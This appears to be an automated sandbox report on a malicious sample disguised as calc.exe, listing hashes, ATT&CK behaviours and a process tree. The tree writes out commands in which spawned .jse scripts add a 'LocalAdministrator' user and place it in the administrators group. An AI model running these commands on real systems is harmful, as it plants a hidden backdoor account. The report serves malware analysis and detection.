Analysis
-
max time kernel
131s -
max time network
134s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-10-2024 01:35
Static task
static1
General
-
Target
calc.exe
-
Size
422KB
-
MD5
4bf28f0b6a5b20681a1378a0d8afe694
-
SHA1
f606479738c2e8dbb67cd9998dc35c830425c559
-
SHA256
cf6b9d70a6b10490407df35b3fb8968de048328614171ab5c9de51d7638eed3a
-
SHA512
73dd9e42e0e8489435b96776df67adb8729c47d06fecb4555447975a8f40c68980c9792446dfad2967888b45e69bbab58c29950d2089097c37ac3cb8477171ae
-
SSDEEP
6144:94v4sIND/AB4jYWoyGN2Ik5AfPjFWFNAy/7+dOYG+/Wi+3I:WABhABEXotkI0A8AyzKOce4
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation calc.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation calc.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation calc.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation calc.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 26 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language calc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language calc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language calc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language calc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language calc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language calc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
Runs net.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4436 wrote to memory of 1148 4436 calc.exe 89 PID 4436 wrote to memory of 1148 4436 calc.exe 89 PID 4436 wrote to memory of 1148 4436 calc.exe 89 PID 1148 wrote to memory of 4476 1148 wscript.exe 90 PID 1148 wrote to memory of 4476 1148 wscript.exe 90 PID 1148 wrote to memory of 4476 1148 wscript.exe 90 PID 1148 wrote to memory of 5004 1148 wscript.exe 92 PID 1148 wrote to memory of 5004 1148 wscript.exe 92 PID 1148 wrote to memory of 5004 1148 wscript.exe 92 PID 1148 wrote to memory of 4144 1148 wscript.exe 94 PID 1148 wrote to memory of 4144 1148 wscript.exe 94 PID 1148 wrote to memory of 4144 1148 wscript.exe 94 PID 5004 wrote to memory of 1928 5004 net.exe 95 PID 5004 wrote to memory of 1928 5004 net.exe 95 PID 5004 wrote to memory of 1928 5004 net.exe 95 PID 4476 wrote to memory of 5036 4476 net.exe 96 PID 4476 wrote to memory of 5036 4476 net.exe 96 PID 4476 wrote to memory of 5036 4476 net.exe 96 PID 4144 wrote to memory of 2436 4144 calc.exe 97 PID 4144 wrote to memory of 2436 4144 calc.exe 97 PID 4144 wrote to memory of 2436 4144 calc.exe 97 PID 2436 wrote to memory of 3924 2436 wscript.exe 98 PID 2436 wrote to memory of 3924 2436 wscript.exe 98 PID 2436 wrote to memory of 3924 2436 wscript.exe 98 PID 2436 wrote to memory of 4272 2436 wscript.exe 100 PID 2436 wrote to memory of 4272 2436 wscript.exe 100 PID 2436 wrote to memory of 4272 2436 wscript.exe 100 PID 2436 wrote to memory of 2116 2436 wscript.exe 102 PID 2436 wrote to memory of 2116 2436 wscript.exe 102 PID 2436 wrote to memory of 2116 2436 wscript.exe 102 PID 3924 wrote to memory of 976 3924 net.exe 103 PID 3924 wrote to memory of 976 3924 net.exe 103 PID 3924 wrote to memory of 976 3924 net.exe 103 PID 4272 wrote to memory of 732 4272 net.exe 104 PID 4272 wrote to memory of 732 4272 net.exe 104 PID 4272 wrote to memory of 732 4272 net.exe 104 PID 3236 wrote to memory of 1148 3236 calc.exe 119 PID 3236 wrote to memory of 1148 3236 calc.exe 119 PID 3236 wrote to memory of 1148 3236 calc.exe 119 PID 1148 wrote to memory of 1132 1148 wscript.exe 120 PID 1148 wrote to memory of 1132 1148 wscript.exe 120 PID 1148 wrote to memory of 1132 1148 wscript.exe 120 PID 1148 wrote to memory of 4216 1148 wscript.exe 122 PID 1148 wrote to memory of 4216 1148 wscript.exe 122 PID 1148 wrote to memory of 4216 1148 wscript.exe 122 PID 1148 wrote to memory of 632 1148 wscript.exe 124 PID 1148 wrote to memory of 632 1148 wscript.exe 124 PID 1148 wrote to memory of 632 1148 wscript.exe 124 PID 1132 wrote to memory of 3744 1132 net.exe 125 PID 1132 wrote to memory of 3744 1132 net.exe 125 PID 1132 wrote to memory of 3744 1132 net.exe 125 PID 4216 wrote to memory of 3836 4216 net.exe 126 PID 4216 wrote to memory of 3836 4216 net.exe 126 PID 4216 wrote to memory of 3836 4216 net.exe 126 PID 632 wrote to memory of 3724 632 calc.exe 127 PID 632 wrote to memory of 3724 632 calc.exe 127 PID 632 wrote to memory of 3724 632 calc.exe 127 PID 3724 wrote to memory of 4952 3724 wscript.exe 128 PID 3724 wrote to memory of 4952 3724 wscript.exe 128 PID 3724 wrote to memory of 4952 3724 wscript.exe 128 PID 3724 wrote to memory of 732 3724 wscript.exe 130 PID 3724 wrote to memory of 732 3724 wscript.exe 130 PID 3724 wrote to memory of 732 3724 wscript.exe 130 PID 3724 wrote to memory of 1016 3724 wscript.exe 132
Processes
-
C:\Users\Admin\AppData\Local\Temp\calc.exe"C:\Users\Admin\AppData\Local\Temp\calc.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" PhNll77Jcb.jse2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" user LocalAdministrator /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user LocalAdministrator /add4⤵
- System Location Discovery: System Language Discovery
PID:5036
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators LocalAdministrator /add4⤵
- System Location Discovery: System Language Discovery
PID:1928
-
-
-
C:\Users\Admin\AppData\Local\Temp\calc.exe"C:\Users\Admin\AppData\Local\Temp\calc.exe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" EeEKhl8oMX.jse4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" user LocalAdministrator /add5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user LocalAdministrator /add6⤵
- System Location Discovery: System Language Discovery
PID:976
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators LocalAdministrator /add6⤵
- System Location Discovery: System Language Discovery
PID:732
-
-
-
C:\Users\Admin\AppData\Local\Temp\calc.exe"C:\Users\Admin\AppData\Local\Temp\calc.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2116
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1044,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=4388 /prefetch:81⤵PID:5040
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3240
-
C:\Users\Admin\AppData\Local\Temp\calc.exe"C:\Users\Admin\AppData\Local\Temp\calc.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" vuGhHO5d1O.jse2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" user LocalAdministrator /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user LocalAdministrator /add4⤵
- System Location Discovery: System Language Discovery
PID:3744
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators LocalAdministrator /add4⤵
- System Location Discovery: System Language Discovery
PID:3836
-
-
-
C:\Users\Admin\AppData\Local\Temp\calc.exe"C:\Users\Admin\AppData\Local\Temp\calc.exe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" xHMpROGr03.jse4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" user LocalAdministrator /add5⤵
- System Location Discovery: System Language Discovery
PID:4952 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user LocalAdministrator /add6⤵
- System Location Discovery: System Language Discovery
PID:4440
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add5⤵
- System Location Discovery: System Language Discovery
PID:732 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators LocalAdministrator /add6⤵
- System Location Discovery: System Language Discovery
PID:412
-
-
-
C:\Users\Admin\AppData\Local\Temp\calc.exe"C:\Users\Admin\AppData\Local\Temp\calc.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1016
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
905B
MD5b4eb7f28555dda63f591a950f2db89d1
SHA192ba2174422096a09ce506c041165564360accc3
SHA25600c9f54dc4deec12db8ba086ec347d03f978e46222d9c5ec5c6240f7ac171c5c
SHA5123268de3032832a54e3251589b6d41ff43f3181e7fbc5de6d466ea45c6db0c8bba6704f87954b4e28a9273067ebe20066169ff70f896a236a3f786291fb660d24